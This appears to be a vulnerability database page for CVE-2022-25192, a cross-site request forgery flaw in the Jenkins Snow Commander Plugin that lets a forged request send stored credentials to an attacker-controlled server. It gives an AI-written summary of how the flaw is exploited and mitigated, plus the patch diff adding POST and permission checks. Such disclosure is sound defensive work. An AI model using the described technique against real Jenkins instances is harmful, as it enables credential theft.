VYPR
← All advisories
Moderate severityNVD Advisory· Published Feb 15, 2022· Updated Aug 3, 2024

CVE-2022-25192

CVE-2022-25192

Description

A CSRF vulnerability in Jenkins Snow Commander Plugin ≤ 1.10 lets attackers use stored credentials by tricking a user into visiting a malicious page.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

A CSRF vulnerability in Jenkins Snow Commander Plugin ≤ 1.10 lets attackers use stored credentials by tricking a user into visiting a malicious page.

Vulnerability

A cross-site request forgery (CSRF) vulnerability exists in the Snow Commander Plugin for Jenkins, versions 1.10 and earlier [1][3]. The plugin fails to require POST requests for specific form validation methods, such as doCheckAddress, doCheckCredentialsId, and doCheckTimeout [2]. An attacker can craft a malicious HTML page that, when visited by an authenticated Jenkins user, triggers a forged request to these endpoints. The affected code path does not enforce the @POST annotation or sufficient permission checks before processing the request [2].

Exploitation

An attacker with knowledge of a victim's Jenkins instance must trick an authenticated user into visiting a page containing a CSRF payload [1]. The attacker also needs valid credentials IDs, which could be obtained through another method (e.g., information disclosure or social engineering) [3]. The forged request targets the unguarded doCheck* methods, which perform actions using attacker-supplied parameters (address and credentials ID) [2]. The request is sent to the Jenkins server from the victim's browser, leveraging the user's active session.

Impact

Successful exploitation allows an attacker to connect to an attacker-controlled web server using credentials stored in Jenkins, effectively capturing those credentials [1][3]. The attacker does not gain direct code execution or administrative privileges, but can exfiltrate credentials, which may lead to further compromise of Jenkins or connected systems. The scope of impact is limited to credential disclosure and unauthorized outbound connections.

Mitigation

The vulnerability is fixed in Snow Commander Plugin version 2.0 or later [4]. Users should upgrade to version 2.0 or newer, which adds the @POST annotation and proper permission checks to the vulnerable form validation methods [2]. There is no known workaround for version 1.10 and earlier; upgrading is the only mitigation [1]. The plugin is not listed in the CISA Known Exploited Vulnerabilities catalog at the time of this writing.

References
  1. Jenkins Security Advisory 2022-02-15
  2. CMSC-21922 Update all public formvalidation functions to require post · jenkinsci/snowsoftware-commander-plugin@4fb4e68
  3. NVD - CVE-2022-25192
  4. GitHub - jenkinsci/snowsoftware-commander-plugin

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
io.jenkins.plugins:embotics-vcommanderMaven
>= 0

Affected products

2

Patches

1
4fb4e68e8e7b

CMSC-21922 Update all public formvalidation functions to require post

https://github.com/jenkinsci/snowsoftware-commander-pluginColin KealtyOct 14, 2021via ghsa
commit
6 files changed · +29 0
  • src/main/java/com/embotics/vlm/plugin/actions/AbstractVCommanderAction.java+6 0 modified
    @@ -3,6 +3,7 @@
 import java.io.IOException;
 
 import javax.servlet.ServletException;
+import javax.ws.rs.POST;
 
 import org.kohsuke.stapler.QueryParameter;
 
@@ -11,6 +12,7 @@
 
 import hudson.model.Descriptor;
 import hudson.util.FormValidation;
+import jenkins.model.Jenkins;
 
 /**
  * A base class to be extended by the vCommadner actions.
@@ -60,7 +62,9 @@ public static abstract class AbstractVCommanderActionDescriptor extends Descript
 		/**
 		 * Called by jelly, to validate timeout field
 		 */
+		@POST
 		public FormValidation doCheckTimeout(@QueryParameter Long value) throws IOException, ServletException {
+			Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
 			if (value == null || value < MINIMUM_TIMEOUT_VALUE) {
 				return FormValidation.error(Messages.VCommanderBuilder_errors_missingTimeout());
 			}
@@ -71,7 +75,9 @@ public FormValidation doCheckTimeout(@QueryParameter Long value) throws IOExcept
 		/**
 		 * Called by jelly, to validate polling field
 		 */
+		@POST
 		public FormValidation doCheckPolling(@QueryParameter Long polling, @QueryParameter Long timeout) throws IOException, ServletException {
+			Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
 			if (polling == null ||polling < MINIMUM_POLLING_VALUE) {
 				return FormValidation.error(Messages.VCommanderBuilder_errors_missingPolling());
 			}
  • src/main/java/com/embotics/vlm/plugin/actions/VCommanderRequestNewServiceAction.java+4 0 modified
    @@ -14,6 +14,7 @@
 import java.io.IOException;
 import java.net.ConnectException;
 import java.util.List;
+import javax.ws.rs.POST;
 
 import javax.servlet.ServletException;
 
@@ -37,6 +38,7 @@
 import hudson.model.Run;
 import hudson.model.TaskListener;
 import hudson.util.FormValidation;
+import jenkins.model.Jenkins;
 
 /**
  * A vCommander Action, which submits a new service request
@@ -192,7 +194,9 @@ public String getPayload(String serviceName) throws IOException, ServletExceptio
 		/**
 		 * Called by jelly, to validate payload field
 		 */
+		@POST
 		public FormValidation doCheckPayload(@QueryParameter String payload) throws IOException, ServletException {
+			Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
 			// if no content, do not return error;
 			// we do not want to show the initial form with error
 			if (StringUtils.isBlank(payload)) {
  • src/main/java/com/embotics/vlm/plugin/actions/VCommanderRunWorkflowAction.java+8 0 modified
    @@ -15,6 +15,7 @@
 import java.net.ConnectException;
 
 import javax.servlet.ServletException;
+import javax.ws.rs.POST;
 
 import org.apache.commons.lang.StringUtils;
 import org.codehaus.jettison.json.JSONException;
@@ -35,6 +36,7 @@
 import hudson.model.TaskListener;
 import hudson.util.ComboBoxModel;
 import hudson.util.FormValidation;
+import jenkins.model.Jenkins;
 
 /**
  * A vCommander Action, which triggers a command workflow
@@ -156,7 +158,9 @@ public ComboBoxModel doFillTargetTypeItems() {
 		/**
 		 * Called by jelly, to validate targetType field
 		 */
+		@POST
 		public FormValidation doCheckTargetType(@QueryParameter String targetType) throws IOException, ServletException {
+			Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
 			// if no content, do not return error;
 			// we do not want to show the initial form with error
 			if (StringUtils.isBlank(targetType)) {
@@ -173,7 +177,9 @@ public FormValidation doCheckTargetType(@QueryParameter String targetType) throw
 		/**
 		 * Called by jelly, to validate targetName field
 		 */
+		@POST
 		public FormValidation doCheckTargetName(@QueryParameter String targetType, @QueryParameter String targetName) throws IOException, ServletException {
+			Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
 			// if no content, do not return error;
 			// we do not want to show the initial form with error
 			if (StringUtils.isBlank(targetName)) {
@@ -190,7 +196,9 @@ public FormValidation doCheckTargetName(@QueryParameter String targetType, @Quer
 		/**
 		 * Called by jelly, to validate workflowName field
 		 */
+		@POST
 		public FormValidation doCheckWorkflowName(@QueryParameter String targetType, @QueryParameter String workflowName) throws IOException, ServletException {
+			Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
 			// if no content, do not return error;
 			// we do not want to show the initial form with error
 			if (StringUtils.isBlank(workflowName)) {
  • src/main/java/com/embotics/vlm/plugin/actions/VCommanderWaitForRequestNewServiceAction.java+4 0 modified
    @@ -14,6 +14,7 @@
 import java.io.IOException;
 
 import javax.servlet.ServletException;
+import javax.ws.rs.POST;
 
 import org.apache.commons.lang.StringUtils;
 import org.kohsuke.stapler.DataBoundConstructor;
@@ -31,6 +32,7 @@
 import hudson.model.Run;
 import hudson.model.TaskListener;
 import hudson.util.FormValidation;
+import jenkins.model.Jenkins;
 
 /**
  * A vCommander Action, which should be used in pair with VCommanderRequestNewServiceAction
@@ -110,7 +112,9 @@ public String getDefaultRequestId() {
 		/**
 		 * Called by jelly, to validate requestId field
 		 */
+		@POST
 		public FormValidation doCheckRequestId(@QueryParameter String requestId) throws IOException, ServletException {
+			Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
 			if(PluginUtils.isNumericOrVariable(requestId)) {
 				return FormValidation.ok();
 			} else {
  • src/main/java/com/embotics/vlm/plugin/actions/VCommanderWaitForRunWorkflowAction.java+4 0 modified
    @@ -14,6 +14,7 @@
 import java.io.IOException;
 
 import javax.servlet.ServletException;
+import javax.ws.rs.POST;
 
 import org.apache.commons.lang.StringUtils;
 import org.kohsuke.stapler.DataBoundConstructor;
@@ -31,6 +32,7 @@
 import hudson.model.Run;
 import hudson.model.TaskListener;
 import hudson.util.FormValidation;
+import jenkins.model.Jenkins;
 
 /**
  * A vCommander Action, which should be used in pair with VCommanderRunWorkflowAction
@@ -100,7 +102,9 @@ public String getDefaultTaskId() {
 		/**
 		 * Called by jelly, to validate task ID field
 		 */
+		@POST
 		public FormValidation doCheckTaskId(@QueryParameter String taskId) throws IOException, ServletException {
+			Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
 			if(PluginUtils.isNumericOrVariable(taskId)) {
 				return FormValidation.ok();
 			} else {
  • src/main/java/com/embotics/vlm/plugin/VCommanderConfig.java+3 0 modified
    @@ -186,7 +186,9 @@ public ListBoxModel doFillCredentialsIdItems(@AncestorInPath Item item, @QueryPa
 	/**
 	 * Called by jelly, to validate address field
 	 */
+	@POST
 	public FormValidation doCheckAddress(@QueryParameter String value) throws IOException, ServletException {
+		Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
 		if (value.length() == 0)
 			return FormValidation.error(Messages.VCommanderConfig_errors_missingAddress());
 
@@ -196,6 +198,7 @@ public FormValidation doCheckAddress(@QueryParameter String value) throws IOExce
 	/**
 	 * Called by jelly, to validate credential field
 	 */
+	@POST
 	public FormValidation doCheckCredentialsId(@AncestorInPath Item item, @QueryParameter String address, @QueryParameter String credentialsId) {
 		// Return no-op validation results for users that do not have permission to list
 		// credentials

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4

News mentions

1